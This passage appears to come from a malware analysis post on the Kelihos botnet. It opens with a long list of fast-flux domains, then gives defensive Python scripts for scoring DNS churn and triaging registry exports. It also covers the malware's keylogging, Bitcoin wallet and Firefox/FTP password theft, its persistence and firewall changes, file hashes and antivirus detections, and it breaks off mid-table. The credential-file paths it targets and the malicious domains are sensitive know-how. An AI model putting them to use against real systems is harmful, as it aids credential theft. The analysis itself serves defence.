iczipyk.in<br />
iddeste.in<br />
igtevax.in<br />
iksutel.in<br />
infobyt.in<br />
itkyguh.in<br />
ivhapuf.in<br />
jepokfa.in<br />
jiifxoz.in<br />
jiquvel.in<br />
juzuxcy.in<br />
kaduqec.in<br />
kiabrok.in<br />
kufirqe.in<br />
kyrocok.in<br />
legycxa.in<br />
leqozdy.in<br />
lexucyl.in<br />
moropdy.in<br />
mutywro.in<br />
myzxozy.in<br />
negmeuw.in<br />
nytutiv.in<br />
ofusqar.in<br />
oqufnyg.in<br />
oxetpah.in<br />
pamywuz.in<br />
pedezby.in<br />
pisyhyn.in<br />
pydilaw.in<br />
qabojir.in<br />
qifufuk.in<br />
raehxez.in<br />
riwgagi.in<br />
rufabex.in<br />
seazdel.in<br />
seompis.in<br />
sinuheh.in<br />
talutyw.in<br />
tarraso.in<br />
tivenyr.in<br />
ucfensa.in<br />
ufbofky.in<br />
ufhewuk.in<br />
ujjukag.in<br />
uqtopik.in<br />
urxiwat.in<br />
uwhepij.in<br />
veqyhli.in<br />
vezkoty.in<br />
vugozan.in<br />
vuqfuek.in<br />
wasidxo.in<br />
wynzobo.in<br />
wyvloiq.in<br />
xategon.in<br />
xevezby.in<br />
xutepyj.in<br />
xuwigir.in<br />
yxfibet.in<br />
yzrefyf.in<br />
zaxseyz.in<br />
zilziom.in<br />
zohdoud.in<br />
zunipaw.in<br />
zynacha.in<br />
firstara.com<br />
<br />
<br />
roblect.com<br />
akzruyh.ce.ms<br />
apeefoacx.ce.ms<br />
ezoglolbj.ce.ms<br />
gcbjbamdj.ce.ms<br />
geljoxlkd.ce.ms<br />
himukcnen.ce.ms<br />
hyyviccku.ce.ms<br />
imoqjzsej.ce.ms<br />
ljltpaffv.ce.ms<br />
lrjvgjwmg.ce.ms<br />
lvfksyqmz.ce.ms<br />
mhfrhelfr.ce.ms<br />
mkiplkooq.ce.ms<br />
nlozaydyk.ce.ms<br />
ouxwexphh.ce.ms<br />
rxhndcxxi.ce.ms<br />
shuxkzjvp.ce.ms<br />
dlmdlemqjw.ce.ms<br />
roblect.com<br />
<br />
<br />
galloma.com<br />
ajyxxun.ce.ms<br />
avtjicn.ce.ms<br />
bbzulty.ce.ms<br />
bhueizz.ce.ms<br />
bmxnbbz.ce.ms<br />
bzzqkjk.ce.ms<br />
cluuocw.ce.ms<br />
cqkjibj.ce.ms<br />
dixrkno.ce.ms<br />
dkwhwqc.ce.ms<br />
eymosvc.ce.ms<br />
ezwrvsq.ce.ms<br />
fautuzh.ce.ms<br />
fbxmkgs.ce.ms<br />
gnrmdds.ce.ms<br />
hvhlazq.ce.ms<br />
iygxhfq.ce.ms<br />
jddpvzw.ce.ms<br />
jejmqny.ce.ms<br />
jlruxuf.ce.ms<br />
jqqvqnv.ce.ms<br />
jvhqpyj.ce.ms<br />
ldntbtg.ce.ms<br />
lkddqig.ce.ms<br />
miulvnp.ce.ms<br />
neitfvf.ce.ms<br />
norwdyd.ce.ms<br />
obsnkwx.ce.ms<br />
oqylgfb.ce.ms<br />
pyxthzm.ce.ms<br />
qbdptev.ce.ms<br />
rkzdnlm.ce.ms<br />
rrfrahh.ce.ms<br />
saogsek.ce.ms<br />
sqwdoei.ce.ms<br />
tazaopm.ce.ms<br />
tyldrgy.ce.ms<br />
ujbtapn.ce.ms<br />
uvqyfnd.ce.ms<br />
vwtnddd.ce.ms<br />
wfbanyv.ce.ms<br />
wukiuxb.ce.ms<br />
wxatkfz.ce.ms<br />
xalagnq.ce.ms<br />
yvfeyyn.ce.ms<br />
zhmeqqs.ce.ms<br />
aadsfqle.ce.ms<br />
aahoqmie.ce.ms<br />
adokxrbx.ce.ms<br />
adpiisyi.ce.ms<br />
azyvxiqw.ce.ms<br />
bwwrudue.ce.ms<br />
ccybfonk.ce.ms<br />
dlylxoca.ce.ms<br />
dplvoghe.ce.ms<br />
egezeqki.ce.ms<br />
fjjlnqdt.ce.ms<br />
flgsajeb.ce.ms<br />
fonpxxvd.ce.ms<br />
gwlgkror.ce.ms<br />
gwtowtjz.ce.ms<br />
hezfpxvr.ce.ms<br />
iesathjc.ce.ms<br />
iigijrqo.ce.ms<br />
ijcyicbj.ce.ms<br />
iupyrwes.ce.ms<br />
kzomxpkx.ce.ms<br />
ltaqntzd.ce.ms<br />
ltjohroy.ce.ms<br />
mhivnltw.ce.ms<br />
nanxawdp.ce.ms<br />
nhdoyayw.ce.ms<br />
nktxmecg.ce.ms<br />
nucmqeml.ce.ms<br />
ogmoupcf.ce.ms<br />
pdmhojaf.ce.ms<br />
phlmdkkg.ce.ms<br />
ptufrgou.ce.ms<br />
pwhwhatr.ce.ms<br />
qgewkpxr.ce.ms<br />
raqdiqwr.ce.ms<br />
reoawbqz.ce.ms<br />
sigafisv.ce.ms<br />
spdyccmi.ce.ms<br />
srqdtssc.ce.ms<br />
tfxjtthw.ce.ms<br />
tlzfdnjv.ce.ms<br />
twszglot.ce.ms<br />
ulpgjmhh.ce.ms<br />
vcrlyfcm.ce.ms<br />
viamftgu.ce.ms<br />
vinlgixi.ce.ms<br />
vlyhbwqp.ce.ms<br />
vvmqwzjd.ce.ms<br />
wanolzyh.ce.ms<br />
wcvlwcqz.ce.ms<br />
wocsgoku.ce.ms<br />
wrtetrxh.ce.ms<br />
xacnagya.ce.ms<br />
xbpfgoob.ce.ms<br />
xyzrriwp.ce.ms<br />
yclrslbn.ce.ms<br />
yfonzetf.ce.ms<br />
zdzmkdll.ce.ms<br />
znfxgwwr.ce.ms<br />
aanhryihh.ce.ms<br />
amwthlqru.ce.ms<br />
axikehkes.ce.ms<br />
axrgpgnay.ce.ms<br />
bqtvpxibn.ce.ms<br />
bsaqfqzof.ce.ms<br />
bugtjtgwx.ce.ms<br />
cmuvcunas.ce.ms<br />
cqszgtvxd.ce.ms<br />
cwpdeuvmo.ce.ms<br />
desajkhtt.ce.ms<br />
dgxdydvqu.ce.ms<br />
dhmykycap.ce.ms<br />
djgkxulbq.ce.ms<br />
dldbiwlib.ce.ms<br />
dmmwbnmba.ce.ms<br />
ebeecytff.ce.ms<br />
eehxpgnfa.ce.ms<br />
elvliioxz.ce.ms<br />
ewqvmeirc.ce.ms<br />
festcfwmb.ce.ms<br />
fnmqkvqhc.ce.ms<br />
fnwqxoaqd.ce.ms<br />
gjfqabqzs.ce.ms<br />
gkqssznth.ce.ms<br />
glfvlbsqy.ce.ms<br />
godlblffu.ce.ms<br />
gxvkuefqy.ce.ms<br />
gzwynxrdz.ce.ms<br />
hagduqcbi.ce.ms<br />
hbddtiimz.ce.ms<br />
hjutzoytz.ce.ms<br />
hpuurfkft.ce.ms<br />
hrrdabsgc.ce.ms<br />
hvcsfnnbl.ce.ms<br />
hxnvbogua.ce.ms<br />
ibhmbiujp.ce.ms<br />
ibnrnrsca.ce.ms<br />
ihtxwgrri.ce.ms<br />
ikbpsegqa.ce.ms<br />
imozsewyo.ce.ms<br />
inyqjraby.ce.ms<br />
iqwkvaleh.ce.ms<br />
iqxflmwpo.ce.ms<br />
ivejampkn.ce.ms<br />
jhzzwrnnv.ce.ms<br />
jkmxhwjzd.ce.ms<br />
jmjnguloo.ce.ms<br />
jovrpwfks.ce.ms<br />
jrctenbni.ce.ms<br />
khnzohexi.ce.ms<br />
klkzahmar.ce.ms<br />
kogqvmbyl.ce.ms<br />
ldgtxgznq.ce.ms<br />
ldzjcvqai.ce.ms<br />
liowklchs.ce.ms<br />
lqvncgwsu.ce.ms<br />
mffhjjuyo.ce.ms<br />
mhiyegpwm.ce.ms<br />
mpnfrtxkb.ce.ms<br />
mxzhmcyus.ce.ms<br />
nbgatlklr.ce.ms<br />
ncqpfwapp.ce.ms<br />
nrsxuxxjk.ce.ms<br />
nzaqohego.ce.ms<br />
ofzdzqhgs.ce.ms<br />
oknstngdx.ce.ms<br />
ooiebkatd.ce.ms<br />
oowkipkpf.ce.ms<br />
ortshbpzv.ce.ms<br />
oueaegkkt.ce.ms<br />
owhhnjtvt.ce.ms<br />
pbxyhsjcl.ce.ms<br />
phttlfxnv.ce.ms<br />
pnsohrgpm.ce.ms<br />
pqqhqklih.ce.ms<br />
qngclqeln.ce.ms<br />
qxztybniy.ce.ms<br />
rdmhzrzab.ce.ms<br />
rllwnboym.ce.ms<br />
rvbkzpsls.ce.ms<br />
rypwddplv.ce.ms<br />
rytfgngkw.ce.ms<br />
sbealjyie.ce.ms<br />
sbryweuao.ce.ms<br />
sdgokmpmp.ce.ms<br />
sfkgvnqll.ce.ms<br />
shhgcqijh.ce.ms<br />
shkrbmwiq.ce.ms<br />
sikoastac.ce.ms<br />
soabvshxw.ce.ms<br />
srcfkmvtz.ce.ms<br />
sstmzbmvc.ce.ms<br />
szdigkjog.ce.ms<br />
thchbcfsr.ce.ms<br />
thxvwlnst.ce.ms<br />
udprbpncg.ce.ms<br />
uiniyiwze.ce.ms<br />
upsbjrgpy.ce.ms<br />
upthfdgon.ce.ms<br />
uuybeevvw.ce.ms<br />
vexojepsn.ce.ms<br />
vojehftlt.ce.ms<br />
vwhbcowxu.ce.ms<br />
vwvabbujm.ce.ms<br />
wodutsrzu.ce.ms<br />
wyfhzlmkw.ce.ms<br />
wzyxueqhy.ce.ms<br />
xbaxsnihc.ce.ms<br />
ygmehzjlg.ce.ms<br />
yorzhrizg.ce.ms<br />
ypflxjlzo.ce.ms<br />
zlkaimpeq.ce.ms<br />
ztngnmmib.ce.ms<br />
zxtvqkftz.ce.ms<br />
aknmlvkeho.ce.ms<br />
apiuxcoauy.ce.ms<br />
buygunnsnw.ce.ms<br />
cblfdefxmf.ce.ms<br />
cmbwsssnlo.ce.ms<br />
cwoomqxtjo.ce.ms<br />
dohnebpdrp.ce.ms<br />
dyioatrhnx.ce.ms<br />
eqqtdwbnwg.ce.ms<br />
eyeamccxvb.ce.ms<br />
hlmewfctuc.ce.ms<br />
iqqspkqdji.ce.ms<br />
jjyzwvufmb.ce.ms<br />
jsgecgfnrw.ce.ms<br />
kvmchjinmu.ce.ms<br />
lglqkkqybq.ce.ms<br />
lqsyddcoot.ce.ms<br />
lvscrnzqzm.ce.ms<br />
mgxstzpxfv.ce.ms<br />
nflmyecafv.ce.ms<br />
nmwhryeybz.ce.ms<br />
noilnvnsie.ce.ms<br />
nuyzxhxyqn.ce.ms<br />
oixtvfudyd.ce.ms<br />
pnfyoidgkn.ce.ms<br />
pnsntpjnhw.ce.ms<br />
pvfnpwoyjq.ce.ms<br />
pxafmmglnp.ce.ms<br />
qdmxpqpkbk.ce.ms<br />
razocjpywj.ce.ms<br />
rcmtvlzbuk.ce.ms<br />
rljgnvkghq.ce.ms<br />
rlybfffajb.ce.ms<br />
rybrueryce.ce.ms<br />
sokhxokonz.ce.ms<br />
spuiygpbcr.ce.ms<br />
sweaxoedyw.ce.ms<br />
sygsgahycs.ce.ms<br />
tepbzktaqg.ce.ms<br />
uupkufucmx.ce.ms<br />
vcoewypubi.ce.ms<br />
xerrwvuuzb.ce.ms<br />
xhmqllyufj.ce.ms<br />
xmfydbnjgq.ce.ms<br />
ydokioxqpc.ce.ms<br />
yefwipbiih.ce.ms<br />
ysjeguxpmt.ce.ms<br />
<br /></div>
<br />
These are lists of the IPs that <b>ns1.boomsco.com</b> (created 2013-01-13) and <b>ns1.larstor.com</b> (created 2012-12-22) have pointed to since their creation. The lists show how fast the IPs change: more than 9,000 times over 30-45 days. There are many infected hosts, but that does not mean every host in the list was infected. Some IPs were used for only a second, which also demonstrates the evasive nature of the fast flux.<br />
<a href="http://files.deependresearch.org/logs/boomsco_asn.txt">http://files.deependresearch.org/logs/boomsco_asn.txt</a><br />
<a href="http://files.deependresearch.org/logs/larstor_asn.txt">http://files.deependresearch.org/logs/larstor_asn.txt</a><br />
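As an added example (not DeepEnd Research's code), the Python below scores a name's resolution history for the behaviour described above: distinct IPs and ASNs, how often the A record changed, and which IPs were served for only seconds. The 'timestamp ip asn' line layout, the documentation-range addresses and the thresholds are constructed assumptions, not the format of the linked logs.<br />

```python
"""Fast-flux scoring for one DNS name from its resolution history.
Added example, not DeepEnd Research's code. The 'timestamp ip asn' line
layout and the sample data are constructed, not the linked logs' format."""
from datetime import datetime
from typing import List, NamedTuple, Optional

class Observation(NamedTuple):
    ts: datetime
    ip: str
    asn: int

class Run(NamedTuple):
    ip: str
    asn: int
    start: datetime
    end: Optional[datetime]  # None: not replaced before the log ends

class FluxStats(NamedTuple):
    distinct_ips: int
    distinct_asns: int
    changes: int           # number of A-record changes observed
    changes_per_hour: float
    min_dwell_s: Optional[float]  # shortest time an IP was served

def parse_observations(text: str) -> List[Observation]:
    """Parse 'YYYY-MM-DDTHH:MM:SS ip asn' lines; blanks and '#' comments skipped."""
    obs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, ip, asn = line.split()
        obs.append(Observation(datetime.fromisoformat(ts), ip, int(asn)))
    obs.sort(key=lambda o: o.ts)
    return obs

def ip_runs(obs: List[Observation]) -> List[Run]:
    """Collapse consecutive observations of one IP into runs; a run ends when a
    different IP is first seen, and the final run has no known end."""
    runs: List[Run] = []
    start = obs[0]
    for cur in obs[1:]:
        if cur.ip != start.ip:
            runs.append(Run(start.ip, start.asn, start.ts, cur.ts))
            start = cur
    runs.append(Run(start.ip, start.asn, start.ts, None))
    return runs

def flux_stats(obs: List[Observation]) -> FluxStats:
    """Summarise churn: distinct IPs/ASNs, change count and rate, shortest dwell."""
    if not obs:
        raise ValueError("no observations")
    runs = ip_runs(obs)
    dwell = [(r.end - r.start).total_seconds() for r in runs if r.end is not None]
    span = (obs[-1].ts - obs[0].ts).total_seconds()
    changes = len(runs) - 1
    return FluxStats(
        distinct_ips=len({o.ip for o in obs}),
        distinct_asns=len({o.asn for o in obs}),
        changes=changes,
        changes_per_hour=changes * 3600 / span if span else 0.0,
        min_dwell_s=min(dwell) if dwell else None,
    )

def short_lived_ips(obs: List[Observation], max_dwell_s: float = 5.0) -> List[str]:
    """IPs that were served for at most max_dwell_s before being swapped out."""
    return [r.ip for r in ip_runs(obs)
            if r.end is not None and (r.end - r.start).total_seconds() <= max_dwell_s]

def is_fast_flux(stats: FluxStats, min_ips: int = 5, min_asns: int = 3,
                 min_changes_per_hour: float = 1.0) -> bool:
    """Heuristic flag: many IPs across many networks, rotated often. Thresholds
    are illustrative; CDNs also spread a name over IPs but rarely many ASNs."""
    return (stats.distinct_ips >= min_ips and stats.distinct_asns >= min_asns
            and stats.changes_per_hour >= min_changes_per_hour)

# Constructed sample logs (RFC 5737 documentation IPs, RFC 5398 documentation ASNs).
FLUX_LOG = """
2013-01-14T00:00:00 192.0.2.10 64496
2013-01-14T00:00:01 198.51.100.7 64497
2013-01-14T00:00:01 198.51.100.7 64497
2013-01-14T00:10:00 203.0.113.21 64498
2013-01-14T00:30:00 192.0.2.44 64496
2013-01-14T01:00:00 198.51.100.9 64499
2013-01-14T02:00:00 203.0.113.5 64498
"""
STABLE_LOG = """
2013-01-14T00:00:00 192.0.2.80 64500
2013-01-14T12:00:00 192.0.2.80 64500
2013-01-15T00:00:00 192.0.2.80 64500
"""

if __name__ == "__main__":
    for name, log in (("flux-like", FLUX_LOG), ("stable", STABLE_LOG)):
        obs = parse_observations(log)
        s = flux_stats(obs)
        print(name, s, "FAST-FLUX" if is_fast_flux(s) else "ok", short_lived_ips(obs))
```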
<br />
<br />
<b style="color: #e69138; font-family: inherit;">Malware functionality and system changes.</b><br />
Based on 0C921935F0880B5C2161B3905F8A3069 - active fresh sample, first seen by Virus 2013-02-06, PE date stamp 2011-30-10.<br />
</div>
<div>
We also analyzed fresh samples with 2013 PE date stamps and observed the same or similar functionality: some lack features such as Firefox or FTP password stealing, while others have the full set. Compared to the Dec. 2012 <a href="http://www.abuse.ch/?p=4878">post by abuse.ch</a>, the overall functionality has not changed much.</div>
<br />
<div>
Functionality:</div>
<ul>
<li>Installs WinPcap and monitors traffic</li>
<li>Keylogging capabilities</li>
</ul>
<blockquote class="tr_bq">
<i>see SetWindowsHookExW in the KERNEL32.dll imports</i></blockquote>
<ul style="text-align: left;">
<li>Steals Bitcoin wallet data (read more at <a href="https://en.bitcoin.it/wiki/Securing_your_wallet">https://en.bitcoin.it/wiki/Securing_your_wallet</a>)</li>
</ul>
<blockquote class="tr_bq">
<i>C:\Documents and Settings\[username]\Application Data\Bitcoin\wallet.dat</i></blockquote>
<ul style="text-align: left;">
<li>Parses Firefox's Password Manager local database in order to steal stored passwords. Firefox stores password data in two files: key3.db (master password / encryption key) and a 'signons' file (encrypted names and passwords). Reads:</li>
</ul>
<blockquote class="tr_bq">
<i>%USERPROFILE%\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\signons.sqlite<br />
%USERPROFILE%\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\key3.db<br />
%USERPROFILE%\[username]\Application Data\Mozilla\Firefox\Profiles\[xxxxxx].default\key3.db</i></blockquote>
<blockquote class="tr_bq" style="text-align: left;">
See the SQL-related imports from ODBCJT32.dll:</blockquote>
<blockquote class="tr_bq">
<i>SQLGetCursorNameW<br />SQLFreeStmt<br />SQLGetConnectAttrW<br />ConfigDialogProc<br />SQLSetCursorNameW<br />SQLSetStmtAttrW<br />SQLFreeConnect<br />SQLCloseCursor<br />DefTxtFmtDlgProc<br />SQLSetConnectAttrW<br />SQLColumnsW<br />SQLDisconnect<br />SQLDriverConnectW<br />SQLTablesW<br />SQLGetDiagFieldW<br />SQLBulkOperations<br />SQLSetPos<br />SQLFreeHandle<br />SQLSetDescFieldW<br />SQLNumResultCols<br />SQLConnectW<br />SQLExecute<br />SQLProcedureColumnsW<br />SQLFetch</i></blockquote>
<ul>
<li>Sends spam</li>
</ul>
<blockquote class="tr_bq" style="text-align: left;">
IMimeMessageTree API calls: IMimeMessageTree parses and creates Internet messages. It treats a message as a tree of bodies, where each body has a header and associated content, and gives a client the most flexible, low-level access to a message. Read more on the IMimeMessageTree interface at <a href="http://msdn.microsoft.com/en-us/library/ms711715(v=vs.85).aspx">http://msdn.microsoft.com/en-us/library/ms711715(v=vs.85).aspx</a></blockquote>
<blockquote class="tr_bq">
Imports from INETCOMM.dll:</blockquote>
<blockquote>
<i>MimeOleSMimeCapAddCert<br />MimeEditIsSafeToRun<br />MimeOleUnEscapeStringInPlace<br />EssSignCertificateDecodeEx<br />etc.</i></blockquote>
<ul style="text-align: left;">
<li>As described previously, steals saved passwords from the FTP applications listed at <a href="http://www.lavasoft.com/mylavasoft/malware-descriptions/blog/backdoorwin32kelihos-trojanwin32genericbt">http://www.lavasoft.com/mylavasoft/malware-descriptions/blog/backdoorwin32kelihos-trojanwin32genericbt</a>. The application names are easy to spot in memory (RAM) dumps.</li>
</ul>
<br />
<span style="font-family: inherit; line-height: 18.99147605895996px;">User agents used (hardcoded in the binaries); they can be seen in memory dumps or after unpacking:</span><br />
<blockquote class="tr_bq" style="text-align: left;">
<ol style="text-align: left;">
<li>Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2a1pre) Gecko/20090403 Firefox/3.6a1pre</li>
<li>Mozilla/5.0 (X11; U; Linux x86_64; cy; rv:1.9.1b3) Gecko/20090327 Fedora/3.1-0.11.beta3.fc11 Firefox/3.1b3</li>
<li>Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11</li>
<li>Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6 ; nl; rv:1.9) Gecko/2008051206 Firefox/3.0</li>
<li>Mozilla/5.0 (Windows; U; Windows NT 6.1; es-AR; rv:1.9) Gecko/2008051206 Firefox/3.0</li>
<li>Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15</li>
<li>Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-HK; rv:1.8.1.7) Gecko Firefox/2.0</li>
<li>Mozilla/5.0 (Windows; U; Win95; it; rv:1.8.1) Gecko/20061010 Firefox/2.0</li>
<li>Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7</li>
<li>Mozilla/5.0 (ZX-81; U; CP/M86; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1</li>
<li>Mozilla/5.0 (X11; U; NetBSD alpha; en-US; rv:1.8) Gecko/20060107 Firefox/1.5</li>
<li>Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1</li>
<li>Mozilla/5.0 (X11; I; SunOS sun4u; en-GB; rv:1.7.8) Gecko/20050713 Firefox/1.0.4</li>
<li>Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.5) Gecko/20041222 Firefox/1.0 (Debian package 1.0-4)</li>
<li>Mozilla/5.0 (Windows; U; Win 9x 4.90; rv:1.7) Gecko/20041103 Firefox/0.9.3</li>
<li>Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9</li>
<li>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)</li>
<li>Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 1.1.4322; Tablet PC 2.0; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; MS-RTC LM 8; InfoPath.3)</li>
<li>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 3.5.21022)</li>
<li>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)</li>
<li>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1)</li>
<li>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)</li>
<li>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)</li>
<li>Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)</li>
<li>Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)</li>
<li>Mozilla/2.0 (compatible; MSIE 3.0; Windows 3.1)</li>
<li>Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)</li>
<li>Microsoft Internet Explorer/1.0 (Windows 95)</li>
</ol>
</blockquote>
<div style="text-align: left;">
<b>System Changes</b>
</div>
<ul style="text-align: left;">
<li>Sets itself to load when Windows starts:</li>
</ul>
<blockquote class="tr_bq">
<i>MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN</i></blockquote>
<ul style="text-align: left;">
<li>Changes Internet Explorer's default home page:</li>
</ul>
<blockquote class="tr_bq">
<i>HKU\S-1-5-21-1715567821-1275210071-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\UserPlayedActive: "DIhnDzXVnPDA+DO4Z72Q5BeL4OTOAPYBa9ef262UWrJ7soV07MpOXsWicda8NBA0tg=="</i></blockquote>
<ul style="text-align: left;">
<li>Makes Windows Firewall changes, adding globally open ports 80/TCP and 53/UDP:</li>
</ul>
<blockquote class="tr_bq">
<i>HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\80:TCP: "80:TCP:*:Enabled:Promo"<br />
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\53:UDP: "53:UDP:*:Enabled:Promo"</i></blockquote>
<ul style="text-align: left;">
<li>Creates the service SERVICES\NPF (the WinPcap service), display name "WinPcap Packet Driver (NPF)"</li>
</ul>
<ul>
<li>The original file is copied to:</li>
</ul>
<blockquote>
<i>C:\WINDOWS\Temp\temp18.exe<br />
C:\WINDOWS\Temp\kb778817.exe -- deleted<br />
C:\WINDOWS\Temp\tmp.exe -- deleted</i></blockquote>
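The system changes above can be checked offline against a registry export. The following is an added example, not code from the original post: it parses a constructed .reg excerpt (the SID, the Run value name and the non-malicious entries are made up; the key paths and the "Promo" firewall values are the ones listed above) and reports Run entries launching from a Temp directory, globally open ports labelled "Promo", the NPF service and the odd Explorer\Advanced value.

```python
"""Triage a registry export for the Kelihos system changes listed above.

Added example, not from the original post. SAMPLE_REG is a constructed .reg
excerpt; the key names checked are those the post lists.
"""
import re

SAMPLE_REG = r"""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Speed Launcher"="C:\\Program Files\\Adobe\\Reader\\Reader_sl.exe"
"Promo"="C:\\WINDOWS\\Temp\\temp18.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP"="80:TCP:*:Enabled:Promo"
"53:UDP"="53:UDP:*:Enabled:Promo"
"3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NPF]
"DisplayName"="WinPcap Packet Driver (NPF)"

[HKEY_USERS\S-1-5-21-0-0-0-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"UserPlayedActive"="DIhnDzXVnPDA+DO4Z72Q5BeL4OTOAPYBa9ef262UWrJ7soV07MpOXsWicda8NBA0tg=="
"""

SECTION_RE = re.compile(r'^\[(.+)\]$')
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<value>.*)"$')


def parse_reg(text):
    """Yield (key_path, value_name, value_data) for each REG_SZ value.

    Only the '"name"="string"' form is handled; .reg escapes '\\' as '\\\\'.
    """
    key = None
    for line in text.splitlines():
        line = line.strip()
        m = SECTION_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and key:
            yield key, m.group("name"), m.group("value").replace("\\\\", "\\")


def triage(text):
    """Return (finding, value_name, value_data) tuples for suspicious entries."""
    findings = []
    for key, name, data in parse_reg(text):
        k = key.lower()
        if k.endswith("\\currentversion\\run") and "\\temp\\" in data.lower():
            # Autostart entry launching a binary out of a Temp directory
            findings.append(("run_from_temp", name, data))
        elif "\\firewallpolicy\\" in k and k.endswith("\\globallyopenports\\list"):
            # Value format is port:proto:scope:state:label; '*' scope = any host
            fields = data.split(":")
            if len(fields) == 5 and fields[2] == "*" and fields[4] == "Promo":
                findings.append(("firewall_open_port", name, data))
        elif k.endswith("\\services\\npf"):
            # Legitimate when WinPcap/Wireshark was installed on purpose
            findings.append(("winpcap_service", name, data))
        elif k.endswith("\\explorer\\advanced") and name == "UserPlayedActive":
            findings.append(("odd_explorer_value", name, data))
    return findings


if __name__ == "__main__":
    for kind, name, data in triage(SAMPLE_REG):
        print(f"{kind:20} {name} = {data}")
```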
<br />
<a href="https://www.virustotal.com/file/55885d1928d39600ce3d99617072bf3632db94352fed8032bc3dce3afe665740/analysis/">VirusTotal results of 0c921935f0880b5c2161b3905f8a3069</a><br />
<br />
SHA256: 55885d1928d39600ce3d99617072bf3632db94352fed8032bc3dce3afe665740<br />
SHA1: 05ca64ccfa582e7787d0238f82336a079aba8419<br />
MD5: 0c921935f0880b5c2161b3905f8a3069<br />
File size: 62.5 KB (64036 bytes)<br />
File type: Win32 EXE<br />
Tags: peexe<br />
Detection ratio: 23 / 46<br />
Analysis date: 2013-02-06 20:08:42 UTC<br />
<table>
<tbody>
<tr><th>Engine</th><th>Detection</th><th>Signature date</th></tr>
<tr><td>Agnitum</td><td>Trojan.PWS.Tepfer!CPwnyKhdTDg</td><td>20130206</td></tr>
<tr><td>AhnLab-V3</td><td>Downloader/Win32.Agent</td><td>20130206</td></tr>
<tr><td>AntiVir</td><td>TR/Crypt.XPACK.Gen2</td><td>20130206</td></tr>
<tr><td>Avast</td><td>Win32:Dropper-gen [Drp]</td><td>20130206</td></tr>
<tr><td>AVG</td><td>Win32/Cryptor</td><td>20130206</td></tr>
<tr><td>BitDefender</td><td>Gen:Variant.Kazy.137742</td><td>20130206</td></tr>
<tr><td>Comodo</td><td>TrojWare.Win32.Kryptik.ASEW</td><td>20130206</td></tr>
<tr><td>DrWeb</td><td>Trojan.DownLoader6.380</td><td>20130206</td></tr>
<tr><td>ESET-NOD32</td><td>a variant of Win32/Kryptik.ASFO</td><td>20130206</td></tr>
<tr><td>F-Secure</td><td>Gen:Variant.Kazy.137742</td><td>20130206</td></tr>
<tr><td>Fortinet</td><td>W32/Kryptik.XUW!tr</td><td>20130206</td></tr>
<tr><td>GData</td><td>Gen:Variant.Kazy.137742</td><td>20130206</td></tr>
<tr><td>Ikarus</td><td>Trojan-PWS.Win32.Tepfer</td><td>20130206</td></tr>
<tr><td>Kaspersky</td><td>Trojan-PSW.Win32.Tepfer.emee</td><td>20130206</td></tr>
<tr><td>Kingsoft</td><td>Win32.Troj.Generic.a.(kcloud)</td><td>20130204</td></tr>
<tr><td>McAfee</td><td>Artemis!0C921935F088</td><td>20130206</td></tr>
<tr><td>McAfee-GW-Edition</td><td>Artemis!0C921935F088</td><td>20130206</td></tr>
<tr><td>MicroWorld-eScan</td><td>Gen:Variant.Kazy.137742</td><td>20130206</td></tr>
<tr><td>NANO-Antivirus</td><td>Trojan.Win32.Kryptik.bevkem</td><td>20130206</td></tr>
